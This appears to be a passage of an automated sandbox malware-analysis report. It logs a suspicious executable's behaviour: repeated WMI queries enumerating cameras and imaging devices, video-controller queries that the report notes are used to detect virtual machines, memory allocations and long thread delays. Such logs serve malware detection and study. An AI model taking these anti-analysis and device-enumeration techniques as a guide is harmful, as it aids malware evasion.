                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\FontHost\ContainerAgentWinSession.exeMemory allocated: 1340000 memory reserve | memory write watchJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeMemory allocated: 1B130000 memory reserve | memory write watchJump to behavior
                              Source: C:\ProgramData\dbg\conhost.exeMemory allocated: 13D0000 memory reserve | memory write watch
                              Source: C:\ProgramData\dbg\conhost.exeMemory allocated: 1B00000 memory reserve | memory write watch
                              Source: C:\ProgramData\dbg\conhost.exeMemory allocated: B80000 memory reserve | memory write watch
                              Source: C:\ProgramData\dbg\conhost.exeMemory allocated: 1A8F0000 memory reserve | memory write watch
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeMemory allocated: 690000 memory reserve | memory write watch
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeMemory allocated: 1A5C0000 memory reserve | memory write watch
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeMemory allocated: 2210000 memory reserve | memory write watch
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeMemory allocated: 1A420000 memory reserve | memory write watch
                              Source: C:\FontHost\ContainerAgentWinSession.exeMemory allocated: 1460000 memory reserve | memory write watch
                              Source: C:\FontHost\ContainerAgentWinSession.exeMemory allocated: 1B130000 memory reserve | memory write watch
                              Source: C:\FontHost\ContainerAgentWinSession.exeMemory allocated: 830000 memory reserve | memory write watch
                              Source: C:\FontHost\ContainerAgentWinSession.exeMemory allocated: 1A420000 memory reserve | memory write watch
                              Source: C:\ProgramData\dbg\conhost.exeMemory allocated: 1300000 memory reserve | memory write watch
                              Source: C:\ProgramData\dbg\conhost.exeMemory allocated: 1B140000 memory reserve | memory write watch
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeMemory allocated: 740000 memory reserve | memory write watch
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeMemory allocated: 1A530000 memory reserve | memory write watch
                              Source: C:\FontHost\ContainerAgentWinSession.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\ProgramData\dbg\conhost.exeThread delayed: delay time: 922337203685477
                              Source: C:\ProgramData\dbg\conhost.exeThread delayed: delay time: 922337203685477
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 922337203685477
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 600000
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 599874
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 599765
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 599578
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 599437
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 599000
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 598515
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 598405
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 300000
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 597625
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 597500
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 597375
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 597000
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 596859
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 3600000
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 596734
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 596618
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 596406
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 596265
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 596048
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 595906
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 595701
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 595578
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 595435
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 594927
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 594812
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 594702
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 594592
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 594480
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 594374
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 594240
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 594124
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 593954
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 593828
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 593688
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 593562
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 593443
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 592906
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 592240
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 592109
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 591977
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 591874
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 591765
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 591628
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 591500
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 591390
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 591281
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 591171
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 591062
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 590939
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 590812
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 590702
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 590581
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 590453
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 590343
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 590230
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 590094
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 589524
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 589369
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 589259
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 589156
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 589046
